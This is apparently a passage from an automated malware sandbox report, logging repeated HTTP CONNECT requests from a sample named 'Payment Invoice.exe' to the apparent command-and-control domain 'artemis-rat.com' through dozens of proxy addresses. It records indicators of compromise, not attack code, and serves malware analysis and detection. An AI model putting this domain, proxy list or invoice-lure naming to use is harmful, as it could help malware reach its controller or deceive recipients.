                                                                1257192.168.2.453893104.19.79.238807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.065711975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.220287085 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1258192.168.2.453894172.67.181.51807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.065851927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.221858025 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1259192.168.2.45188950.84.107.9481117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.067038059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.995951891 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1260192.168.2.4538153.12.144.14631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.068393946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.284998894 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1261192.168.2.453901172.67.181.144807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.068646908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.229505062 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1262192.168.2.453064162.241.45.22556107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.069303036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089565039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183367014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1263192.168.2.451832119.91.214.11933897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.071952105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.979790926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1264192.168.2.45301895.165.129.5588337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.078017950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.451345921 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1265192.168.2.452597116.106.105.5510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.080657005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1266192.168.2.45376177.91.74.77807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.080928087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.417309999 CET129INHTTP/1.1 301 Moved Permanently
                                                                Location: https://artemis-rat.com:443
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1267192.168.2.45382572.10.160.17128817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.083332062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.050015926 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1268192.168.2.451989104.36.166.34502607076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.085779905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1269192.168.2.453769117.54.114.98807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.098701000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1270192.168.2.453772138.2.73.15710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.100596905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1271192.168.2.453694103.163.51.254807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.199807882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1272192.168.2.45390466.228.35.209448097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.199825048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1273192.168.2.453896167.99.55.19731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.200048923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792448997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480408907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.886672974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.589567900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277179003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1274192.168.2.45188037.44.247.21731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.200050116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.266277075 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1275192.168.2.453849190.97.238.819997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.205022097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.245055914 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1276192.168.2.45386343.133.10.16531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.207541943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.824038982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.824081898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515176058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.823909998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.370632887 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1277192.168.2.453540120.194.4.15754437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.208451033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511204004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515120983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.323848963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.019526005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.620836020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.323657036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.511122942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.714216948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1278192.168.2.45374290.188.250.16807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.209928036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1279192.168.2.452043186.124.164.213807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.210516930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1280192.168.2.453848134.209.189.42807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.210560083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.503988028 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1281192.168.2.453048146.56.146.5483847076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.210742950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.276937962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.329397917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1282192.168.2.453951104.17.239.10807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.210742950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.365252972 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1283192.168.2.453971104.19.106.122807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.211848974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.366425037 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
